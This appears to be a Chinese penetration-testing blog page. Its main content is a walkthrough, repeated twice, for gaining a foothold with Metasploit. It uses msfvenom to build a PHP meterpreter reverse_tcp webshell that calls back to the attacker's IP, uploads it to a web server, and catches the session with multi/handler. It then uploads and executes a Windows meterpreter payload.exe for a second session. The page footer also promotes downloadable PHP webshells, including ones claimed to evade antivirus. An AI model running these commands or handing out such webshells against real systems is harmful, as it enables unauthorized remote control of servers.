j4s0nh4ck
- 浏览: 285022 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set LHOST Attacker's_IP
6. set LPORT 443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set LHOST Attacker's_IP
6. set LPORT 443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session
分享到:
发表评论
-
linux 安装scrapy
2015-09-07 13:06 590由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 410based on our case, we need to h ... -
wpscan
2015-08-01 10:39 427https://www.digitalocean.com/co ... -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 476https://zeltser.com/c2-dns-tunn ... -
arachni-web-ui使用
2015-06-10 01:04 2137最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 333http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 332解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 443原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 418http://blog.nibblesec.org/2015/ ... -
[转]Deep Dive Into Stageless Meterpreter Payloads
2015-03-31 01:13 556https://community.rapid7.com/co ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 567原文地址:https://blog.netspi.com/du ... -
[译]解密MSSQL密码
2015-03-26 00:43 2863原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 318原文地址:http://blog.gdssecurity.co ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1036参考:http://www.david-guembel.de/ ... -
[转]Microsoft Access sqli
2015-03-18 00:57 428https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1582https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 654参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4105原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 841原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 633http://digi.ninja/blog/zap_web_ ...
相关推荐
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里...
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号...
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,...
webshell最新PHP NULL&SubnetMask=255.255.255.0&DNSServer1=192.168.10.1&DNSServer2=NULL&DNSServer3=NULL&DomainName=NULL&IPRouters=192.168.10.1
【标题】"wso_webshell_php_" 涉及的核心知识点是Webshell和PHP编程语言在网络安全中的应用。 Webshell,又称为Web后门,是一种通过Web服务端口植入的恶意脚本,允许攻击者远程控制被黑服务器。在描述中提到的...
PHP webshell
标题 "2011版php webshell 国外版" 提到的是一个针对PHP环境的Webshell工具,这种工具在网络安全领域中具有特殊意义。Webshell通常被黑客用于远程控制和管理目标服务器,提供一系列命令执行、文件操作、数据库交互等...
【标题】"2016最新php免杀webshell过安全狗" 描述了这个压缩包文件中的PHP脚本能够避开安全狗等Web安全防护软件的检测,从而在2016年时被认为是可以成功上传并执行的Webshell。Webshell通常是指攻击者通过SQL注入、...
php webshell 无后门,未加密
webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。
php webshell 需要的朋友可以下载!
增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。
"基于文本向量的php-webshell检测方法" 本文提出了一种基于文本向量的php-webshell检测方法,旨在解决传统静态检测方法不能有效识别混淆后的php-webshell脚本和从未出现过的php-webshell脚本的问题。该方法使用*n-...
【基于机器学习的PHP-WebShell扫描工具】 在网络安全领域,WebShell是一种常见的攻击手段,攻击者通过植入WebShell获取服务器的控制权。为了防御这种威胁,开发了各种扫描工具,其中“基于机器学习的PHP-WebShell...
可以方便进行目录管理,探测服务器信息,编辑修改删除创建文件,修改权限,连接mysql数据库 密码:nst
php一句话webshell 服务端和客户端,一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎...
这里我们将深入探讨asp、php、aspx和jsp四种类型的Webshell以及相关安全知识。 1. ASP(Active Server Pages)Webshell:ASP是微软开发的一种服务器端脚本环境,用于生成动态网页。ASP Webshell通常是攻击者利用ASP...
php webshell 2022年11月 最新过安全狗 过360 无特征码版本 特点: 一、没有特征码; 二、全网独创,采用我自己写的加密技术,防止被反向解密; 三、仅用于学习用途,请勿用于法用途; 四、webshell源码采用的是c99
WebShell管理中心箱子3.0源码,系统采用PHP+MySql搭建 ,数据采用了PhpCms的加密方式,可靠性高 ,全局防注入、XSS等常见入侵方式,安全性高。 源码安装方法 1.新建webshell数据库 2.执行webshell.sql文件 3.上传到...
PHP webshell, 非常好用的 PHP webshell 非常好用的 PHP webshell